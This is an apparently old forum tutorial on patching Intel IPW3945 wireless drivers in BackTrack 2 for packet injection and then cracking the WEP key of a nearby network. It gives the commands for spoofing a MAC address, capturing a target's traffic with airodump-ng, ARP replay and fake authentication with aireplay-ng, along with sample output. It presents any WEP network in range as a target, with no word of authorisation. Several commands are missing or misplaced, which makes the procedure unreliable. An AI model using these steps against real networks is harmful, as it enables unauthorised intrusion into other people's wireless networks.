In Backtrack 2, And allmost all other Linux Disto's, Intel Based cards can not inject packets into Wireless networks. This Step-by-Step guide is written for the people that are having trouble getting the injection patches to work. If you follow this from Start To Finish, Im 90% sure your IPW3945 Based card WILL be able to Inject =]
After having quite a bit of trouble myself, I wrote this tutorial on my own Experience, For anybody that is having trouble with the IPW3945 Cards Injecting. This Tutorial was made Originally made for w4ck1ng.com, but Ive decided to post it on remote-exploit.org forums.
Please do not rip this and post it on other sites as your own. Don't be harsh on it either, This is the First Tutorial I've Written before. I take no responsibility for anything that may go wrong. =p
First of all, This tutorial is written for 'BackTrack 2', So please do not post here asking for help using BT3 Beta. Use the Remote Exploit forums for that.
1. Starting off, Updating Aircrack-NG
2. Downloading and installing IPWRAW
3. Loading and Unloading the Drivers
4. Cracking WEP with our new drivers
5. Cracking WEP with our new drivers : Part II
Starting off, Updating Aircrack-NG
In Backtrack 2 Stable, The IPW3945 Drivers are not loaded by default, So we need to navigate and click on:
This loads the drivers, every time we startup we have to do this. Later I will introduce the "Alias" command, So that we can easily load and unload all of the drivers.
Menu -> Backtrack -> Radio Network Analysis -> 80211 -> Misc -> Load IPW3945
Once you have loaded the IPW3945 Drivers, Be sure to connect to a Wireless Network WITH Internet Access by using "Wireless Assistant" Located in:
Once we have successfully done this, We need to update our "aircrack-ng" suite. Open a Shell and type:
Menu -> Internet -> Wireless Assistant
This Step is fairly important, as the updated aircrack suite adds the PTW (-z) Cracking option, Which Cracks WEP keys ALOT faster than aircrack by-itself.
Downloading and installing IPWRAW
OK! Now we have successfully updated the aircrack suit, Its time to get down to business and get these drivers working!
Download the IPWraw drivers from here:
Save the File in the /tmp directory
Go back into the shell again, and locate to your tmp dir by typing
Then do the following in the shell :
Extract the File we downloaded:
NOTE: The * Means to press <TAB> To compete the filename Automatically
tar -xjf ipwraw-ng*
Change the Current Directory to the one you extracted:
Make the installation:
We can now blacklist IPWRAW, So that it does not load on startup, We do this by entering:
NOTE:: If you blacklist IPWRAW, you usually get little warnings when Loading/Unloading Drivers, These are fine.
echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw
sudo depmod -ae
EG ::WARNING: /etc/modprobe.d/ipwraw line 1: ignoring bad line starting with 'Blacklist
Loading and Unloading the Drivers
We have now finished installing IPWRAW, We should now be able to inject while cracking WEP!~
Later, I will explain the use of "Alias" commands, Which will help us load and unload the drivers easier. For now we can do this,
Load the IPWRAW drivers with this command:
Warning : This will put your card into monitor mode, you will not be able to access the internet whilst you have the IPWraw Drivers loaded. And you can NOT have both IPW3945 and IPWRAW drivers running at the same time.
You should now get a message saying something about 'rtap0' being ready, This is a good thing =D
To UNLOAD the IPWraw drivers, Enter:
/sbin/modprobe -r ipwraw
And to Reload the IPW3945 Drivers to access the Internet, Type:
...And to Unload the IPW3945 Drivers:
/sbin/modprobe -r ipw3945
Cracking WEP with our new drivers
The first thing we need to do, Is to edit our kismet.conf file to recognise out new interfaces.
Do this by typing into a shell :
Scroll all the way to the bottom of the file and enter this for "Source"
Save by pressing "Ctrl + O", Then Enter. Then Exit by pressing "CTRL + X"
Now we are almost ready to start, First of all we need some information on the Target.
In the shell, Enter:
After a few moments, Kismet should load up, and you should have a Screen with at least one Wireless AP on it, If you don't, You need to find some, because if there is none there, We cant crack anything!
We now need to select a Network from the list, and note some of its details. See the "W" up the top? This stands for WEP. Each AP will have Y or N, We need to choose one that has a "Y", This means it is using WEP. We should choose a network that does have some packet flow, Because we need to know that we are in a good range of the router.
Open up a KWrite Document and note down the Name , Channel , And the IP Range of the Target, The IP range may not be there, that is fine.
Press "Ctrl + C" To shutdown Kismet
We should now Fake our MAC address, we do this by typing this into a shell:
Our output should be:
macchanger -m 00:11:22:33:44:55 wifi0
Current MAC: 00:xx:xx:xx:xx:xx (unknown)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
Now we must run 'airodump' on rtap0
You should see a few BSSID's etc, We need to find our target, Look at the ESSID and find the target we saw in Kismet, We can see that it is WEP, and we have a bunch of other information about the AP.
Press "Ctrl + C" To stop airodump, and copy the entire line of your Target into Kwrite eg:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:56:B4:6C:CD:92 0 73 20 3 6 54 WEP linksys
The main thing we need here, Is the Channel Number (6) in this case, and the BSSID.
Now me must edit our wireless cards by changing some options, With the ones we just gathered. Follow the commands given below:
Now we are on the same channel, Etc as our Target.
ifconfig wifi0 down
#Change to AP BSSID
# Change to the channel of the Target AP
# Change The value from 108 to 2
ifconfig wifi0 up
Now comes the fun stuff, Actually Getting the WEP key.
In a shell put:
The dump should save as "ExPlOiT.cap" in "/", the -b Option allows us to only capture data from our Target, And not other AP's
airodump-ng --channel 6 --write ExPlOiT -b 00:16:B6:6C:CD:92 wifi0
We now leave that shell open Capturing Data, and open a new shell
Now run aireplay-ng
E.G aireplay-ng -3 -b 00:16:B6:6C:CD:92 -h 00:11:22:33:44:55 wifi0
aireplay-ng -3 -b <mac address of ap> -h <mac of my interface> wifi0
This can tell how many ARP requests we are getting, Leave it running also, and open ANOTHER new shell, This should be our Third Shell.
We now Assosiate ourselves with the AP!
First we will lower our rate with our card by doing this:
Now we wssisiate ourselves with the AP!
iwconfig wif0 rate 1M
EG. aireplay-ng -1 0 -e Motorola9214 -a 00:16:B6:6C:CD:92 -h 00:11:22:33:44:55 wifi0
aireplay-ng -1 0 -e <Name of Network> -a <BSSID> -h <YOUR MAC> wifi0
We should get output like this:
Wait paitently, watching our aireplay window...
03:35:59 Waiting for beacon frame (BSSID: 00:16:B6:6C:CD:92)
03:35:59 Sending Authentication Request
03:35:59 Authentication successful
03:35:59 Sending Association Request
03:36:04 Association successfull :-)
Our "got XXXXX ARP Requests" should start rocketing now. We should wait untill we have captured about ~60,000 , Or about 100,000 for maximal results.
Once we have reached those marks, Press "CTRL + C" in all Three shells, To stop the process.
Proceed to Part II!